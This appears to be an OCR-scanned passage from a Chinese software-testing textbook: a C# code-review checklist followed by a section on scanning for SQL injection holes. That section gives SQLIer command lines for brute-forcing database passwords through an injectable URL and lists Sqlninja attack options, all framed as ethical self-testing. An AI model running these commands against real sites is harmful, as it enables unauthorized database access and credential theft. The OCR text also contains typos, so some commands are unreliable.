序 带 来 了 极 大 的 灵活 性 。 

以 下 实例 列举 了 几 种 不 好 的 做 法 ， 包 括 使 用 硬 编码 路 径 和 公共 变量 : 
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public static readonly string SnippetSchemaPathBegin = 
@"C:\Program Files\Microsoft Visual Studio 8\Xml\Schemas\"; 
如 下 代码 所 示 ， 该 语句 无 法 通过 使 用 公共 属性 和 SystemDrive 环境 变量 重 写 : 


public string SnippetSchemaPathBegin 
{ get 
{ return snippetSchemaPathBegin; } } 
private static string snippetSchemaPathBegin = 
Environment .ExpandEnvironmentVariables ("%SystemDrive%®" + @"\Program 
Files\Microsoft Visual Studio 8\Xml\Schemas"); 


与 此 类 似 ， 有 人 可 能 会 使 用 ProgramFiles 环境 变量 ， 如 下 所 示 : 

private static string snippetSchemaPathBegin = 

Path .Combine (Environment .GetEnvironmentVariable ("ProgramFiles"), 

@"Microsoft Visual Studio 8\Xml\Schemas"); 

15) 命名 约定 

通常 ， 名 称 必须 可 读 ， 而 且 必 须 能 够 清楚 地 描述 相关 对 象 。 因 此 ， 在 执行 代码 检查 时 
要 在 名 称 、 短 名 称 或 非 描 述 性 名 称 中 查找 简写 形式 。 函 数 和 方法 名 称 应 该 以 动词 开头 ， 这 
样 可 以 指明 函数 或 方法 对 其 对 象 所 执行 的 操作 。 与 此 类 似 ， 变 量 名 称 和 属性 名 称 应 该 使 用 
名 词 ， 因 为 它们 都 属于 对 象 。 例 如 ， 如 果 是 为 平面 几何 对 象 (如 “ 圆 ”) 编写 类 ， 则 可 以 
定义 名 称 为 CenterPoint 和 Radius， 该 类 可 能 会 包含 名 为 CalculateCircumference 和 
CalculateArea 的 函数 。 

16) 名 称 中 的 大 小 写 约定 

确认 源 代码 遵从 之 前 推荐 参考 的 “命名 准则 ”文档 的 大 小 写 样式 。 也 就 是 说 ， 对 于 参 
数 、 局 部 变量 和 类 的 私有 或 保护 变量 ， 推 荐 使 用 camelCasing (驼峰 式 大 小 写 ) 样式 (名称 
中 的 第 一 个 字母 小 写 ， 后 续 每 个 子 序列 词 的 第 一 个 字母 大 写 ) 或 PascalCasing (PASCAL 
式 大 小 写 ) 样式 〈 名 称 中 每 个 词 的 第 一 个 字母 大 写 ) 。 

17) 匈牙利 表示 法 

对 于 托管 代码 ， 不 推荐 使 用 匈牙利 表示 法 。 匈 牙 利 表示 法 很 难 正确 使 用 ， 而 且 不 易 阅 
读 ， 并 且 还 可 能 会 造成 逻辑 性 的 理解 混乱 。 部 分 人 在 长 期 使 用 C 或 C++ 编码 时 养 成 了 使 用 
匈牙利 表示 法 的 习惯 ， 请 在 代码 检查 中 查找 这 类 情况 。 

18) 异常 的 引发 

如 果 代 码 引 发 异常 ， 请 确保 异常 的 类 型 是 合适 的 ， 并 且 显 示 的 消息 能 够 清楚 地 标明 导 
致 代码 引发 异常 的 问题 所 在 。 在 异常 消息 中 给 出 尽 可 能 多 的 调试 信息 。 无 论 是 通过 跟踪 堆 
栈 还 是 日 志文 件 来 诊断 问题 都 会 有 所 帮助 。 

19) 异常 的 捕获 

如 果 所 要 检查 的 代码 调用 了 可 能 会 引发 异常 的 方法 ， 请 确认 该 代码 将 会 处 理 异 常 并 确 
保 在 处 理 时 采取 合理 的 操作 。 例 如 ，File.Open 会 引发 多 种 常见 异常 ， 包括 
FileNotFoundException 和 UnauthorizedAccessException， 合 理 的 方法 是 捕获 这 些 异常 并 向 
用 户 显示 错误 消息 。 

20) 异常 的 定义 

如 果 代码 要 为 程序 集 定义 异常 ， 应 该 在 全 局 异常 类 中 为 程序 集 定 义 常 用 的 类 型 ， 在 类 
本 身 中 定义 该 类 独 有 的 异常 。 
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21) 使 用 区 域 来 组 织 代码 

在 检查 代码 时 ， 查 看 是 否 合 理 使 用 了 区 域 来 改善 代码 的 可 读 性 。 通 常 ， 区 域 并 没有 得 
到 充分 的 利用 。 

区 域 有 助 于 按照 逻辑 组 织 代码 并 提高 大 文件 的 可 读 性 ， 可 以 将 不 需要 的 区 域 折 辣 隐 藏 
起 来 ， 而 只 查看 当前 需要 的 代码 部 分 。 折 全 隐 藏 区 域 还 便于 在 大 文件 中 通过 滚动 操作 来 查 
找 某 个 要 查看 的 区 域 。 不 过 ， 需 要 注意 嵌 套 区 域 的 使 用 。 折 和 登 一 个 外 部 区 域 会 隐藏 内 部 区 
域 ， 这 实际 上 给 查找 相关 区 域 增加 了 难度 。 

使 用 区 域 的 常见 位 置 有 类 的 私有 数据 、 构 造 函 数 、 公 共 属 性 、 私 有 方法 和 公共 方法 等 
内 容 附近 。 在 测试 项 目 过 程 中 ， 通 常 使 用 区 域 对 测试 进行 分 组 。 例 如 ， 区 域 可 能 会 针对 类 
的 某 个 方法 对 单元 测试 进行 分 组 。 

22) 使 用 空 行 分 隔 定义 

在 同一 级 别 的 两 个 定义 之 间 使 用 空 行 ， 可 以 提高 可 读 性 。 不 过 ， 切 勿 使 用 两 个 以 上 的 
连续 空 行 。 

23) 不 要 使 用 公共 变量 

确认 类 的 数据 变量 声明 为 私有 变量 。 如 果 选 择 允许 对 类 中 的 数据 进行 访问 ， 需 要 定义 
公共 属性 或 保护 属性 以 便 用 户 能 够 访问 。 

24) 使 用 返回 语句 

如 果 方 法 会 返回 值 ， 则 该 方法 必须 使 用 返回 语句 ， 而 不 是 将 值 赋 给 该 方法 的 名 称 。 

25) 不 要 使 用 Goto 语 扣 

没有 必要 使 用 Goto 语句 。 人 们 可 能 偶尔 会 在 特殊 情况 下 需要 使 用 Goto 语句 ， 但 如 果 
在 代码 检查 时 遇 到 这 些 语句 ， 则 应 引发 警告 。 

26) 数值 常量 

默认 情况 下 ， 几 乎 所 有 的 调试 工具 都 会 以 十 六 进 制 形式 显示 数值 常量 。 因 此 ， 对 于 窗 
口 IJD、 控 件 ID 等 对 象 ， 要 以 十 六 进 制 形式 定义 数值 常量 ， 这 样 在 调试 过 程 中 就 不 用 再 次 
转换 。 


























15.4 数据 库 安全 扫描 


现在 有 一 些 工 具 能 够 实施 SQL 注入 攻击 。 如果 有 一 个 连接 到 后 端 数据 库 的 Web 前 端 ， 
允许 ASP、ASPNET、CGI 和 类 似 的 脚本 语言 支持 的 动态 用 户 输入 ， 就 可 能 遭 到 SQL 注入 
攻击 ， 我 们 能 做 的 就 是 以 道德 黑客 〈Ethical Hacking) 的 方式 对 你 自己 的 系统 实施 自动 的 
SQL 注入 攻击 ， 以 便 发 现 漏洞 所 在 。 

下 面 是 以 自动 方式 测试 系统 SQL 注入 安全 漏洞 的 两 个 步 又; 

1. 扫描 安全 漏洞 


首先 , 使 用 一 个 Web 应 用 程序 安全 漏洞 扫描 器 扫描 网 站 , 看 看 是 否 存 在 输入 过 滤 或 其 
他 具体 的 SQL 注入 安全 漏洞 。 假 如 管理 人 员 时 间 总 是 很 紧张 ， 却 需要 良好 的 报告 功能 ， 推 
荐 使 用 商用 工具 ， 如 N-Stealth 安全 扫描 器 、Acunetix 公司 的 Web 安全 漏洞 扫描 器 和 SPI 
Dynamics WebInspect。Wikto 等 免费 的 工具 通常 也 能 发 现 这 些 安全 漏洞 。 
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如 图 15-11 所 示 ， 工 具 扫 描 出 两 个 SQL 安全 漏洞 。 


上 问题 信息 L&W 咨询 | @ 修订 建议 | 3 请 求 /响应 

















SQL 注 入 
EE http://demo.testfire.net/bank/ws.asmx (2) 


@ _pattemParameter SOAP_creditAccount_ 2 < 


@ _pattemParameter SOAP_debiAccount_1 < 
月 是 效 : 2 | 变 舍 数 ， 28 








使 用 “下 一 个 止 一 个 ”箭头 ， 以 全 局 浏览 个 别 问题 的 详细 信息 
图 15-11 发 现 SQL 注入 安全 漏洞 


2. 开始 SQL 注入 


一 旦 确定 目标 系统 存在 SQL 注入 安全 漏洞 ， 下 一 步 就 是 实施 SQL 注入 过 程 并 且 确 定 
E 够 从 数据 库 中 搜集 的 数据 。 需 要 注意 的 是 ， 不 建议 注入 实际 的 数据 或 者 试图 投放 数据 库 
表格 ， 这 两 种 做 法 对 于 数据 库 的 安全 都 是 有 害 的 。 发 现 潜在 的 SQL 注入 漏洞 是 一 回 事 ， 以 
自动 的 方式 实际 实施 攻击 是 另 一 回 事 。 

比较 流行 的 SQL 注入 攻击 工具 是 SPI Dynamics 公司 的 AQL 注入 器 (这 个 工具 是 
WebInspect 软件 的 一 部 分 ) ， 另 外 还 可 以 使 用 Absinthe。 

这 两 种 工具 能 够 让 开发 人 员 实施 基本 攻击 和 SQL 盲 注 攻击 。 这 两 种 测试 都 应 该 实施 ， 
特别 是 基本 的 SQL 注入 攻击 没有 返回 任何 结果 的 情况 下 。 工 具 能 够 以 自动 的 方式 快速 查询 
和 提取 数据 。 

另外 ,工具 SQLIer 可 以 找到 网 站 上 有 SQL 注入 漏洞 的 URL， 并 根据 有 关 信 息 生成 利 
用 SQL 注入 漏洞 ， 但 它 不 要 求 用 户 的 交互 。 通 过 这 种 方法 可 以 生成 一 个 UNION SELECT 
查询 ， 进 而 可 以 强力 攻击 数据 库 密码 。 这 个 程序 在 利用 漏洞 时 并 不 使 用 引号 ， 这 意味 着 它 
可 适应 多 种 类 型 的 网 站 。 

SQLIer 通过 “true/false”SQL 注入 漏洞 强力 密码 。 借 助 于 “true/false” SQL 注入 漏洞 
强力 密码 ， 用 户 无 法 从 数据 库 查 询 数据 ， 只 能 查询 一 个 可 返回 tue、false 值 的 语句 。 

据 统计 ， 一 个 8 个 字符 的 密码 〈 包 括 十 进 制 ASCII 代码 的 任何 字符 ) 仅 需要 大 约 1 分 
钟 即 可 破解 。 其 使 用 语法 如 下 : 

sqlier [选项 ] [URL] 

-c : [主机 ] 清除 主机 的 漏洞 利用 信息 。 
-s : [ 秒 ] 在 网 页 请 求 之 间 等 待 的 秒 数 。 
-u: [用 户 名 ] 从 数据 库 中 强力 攻击 的 用 户 名 ， 用 逗号 隔 开 。 
-w: [选项 ] 将 [选项 ] 交 由 wget。 
此 外 ， 此 程序 还 支持 猜测 字段 名 ， 有 如 下 几 种 选择 : 


--table-names [表格 名 称 ] : 可 进行 猜测 的 表格 名 称 ， 用 逗号 隔 开 。 
--user-fields [用 户 字 段 ] : 可 进行 猜测 的 用 户 名 字段 名 称 ， 用 逗号 隔 开 。 
--pass-fields [密码 字段 ]: 可 进行 猜测 的 密码 字段 名 称 ， 用 去 号 隔 开 。 


下 面 是 其 基本 用 法 。 例 如 ， 假 设 在 下 面 的 URL 中 有 一 个 SQL 注入 漏洞 : 
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http://example.com/sqlihole.php?id=2 
运行 下 面 这 个 命令 ， 从 数据 库 中 得 到 足够 的 信息 ， 利 用 其 密码 ， 其 中 的 数字 10 表示 
要 在 每 次 查询 之 间 等 待 10 秒 钟 。 
sqlier -5 10 http://example.com/sqlihole.php?id=1 


如 果 表格 、 用 户 名 字段 、 密 码 字段 名 猜测 得 正确 ， 那 么 漏洞 利用 程序 会 把 用 户 名 交付 
查询 ， 准 备 从 数据 库 中 强力 攻击 密码 : 


sqlier -s 10 example.com -u BCable,administrator, root,user4 


然而 ， 如 果 内 建 的 字段 /表格 名 称 没有 猜 中 正确 的 字段 名 ， 用 户 就 可 以 执行 : 

sqlier -s 10 example.com --table-names [table names] --user-fields 

[user fields] --pass-fields [pass fields] 

除非 知道 了 正确 的 表格 名 、 用 户 名 字段 、 密 码 字 段 名 ; 否则 SQLIer 无 法 从 数据 库 中 
强力 攻击 密码 。 

Sqlninja 可 以 利用 以 SQL Server 为 后 端 数据 支持 的 应 用 程序 的 漏洞 ， 其 主要 目标 是 提 
供 对 有 漏洞 的 数据 库 服务 器 的 远程 访问 。Sqlninja 的 行为 受到 配置 文件 的 控制 ， 它 告诉 
Sqlninja 攻击 的 目标 和 方式 ， 还 有 一 些 命令 行 选项 。 比 如 : 

-m: 攻击 模式 ， 有 测试 (test) 、 指 纹 识 别 〈fingerprint) 、 强 力 攻 击 (bruteforce) 等 。 

-v; 指明 进行 详细 输出 。 

-f: 配置 文件 ， 指 明 一 个 使 用 的 配置 文件 。 

-w: 单词 列表 ， 指 明 以 强力 攻击 模式 使 用 的 单词 列表 。 
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